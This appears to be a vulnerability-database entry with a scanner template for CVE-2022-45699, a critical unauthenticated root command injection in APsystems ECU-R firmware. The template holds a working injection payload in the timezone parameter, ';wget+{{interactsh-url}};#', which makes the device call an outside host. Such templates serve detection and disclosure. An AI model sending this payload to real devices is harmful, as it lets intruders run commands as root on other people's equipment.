漏洞描述
Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter.
CVE-2022-45699: APsystems ECU-R Firmware - Command Injection
PoC代码[已公开]
id: CVE-2022-45699
info:
name: APsystems ECU-R Firmware - Command Injection
author: pussycat0x
severity: critical
description: |
Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter.
reference:
- https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-45699
cwe-id: CWE-78,CWE-94
epss-score: 0.90725
epss-percentile: 0.99603
cpe: cpe:2.3:o:apsystems:ecu-r_firmware:5203:*:*:*:*:*:*:*
metadata:
vendor: apsystems
product: ecu-r_firmware
tags: cve,cve2022,rce,apsystems
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "<title>Altenergy Power Control Software"
internal: true
- raw:
- |
POST /index.php/management/set_timezone HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
timezone=;wget+{{interactsh-url}};#
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 490a004630440220663d95318910e1b021c9eb6ced49c89c83d7b1c9e3f5c7266eb40d3238d5098002200b3507e72a1de15a8107cb66c4478a1a137729f0a9ac99488f8b631b3fdbb40a:922c64590222798bb761d5b6d8e72950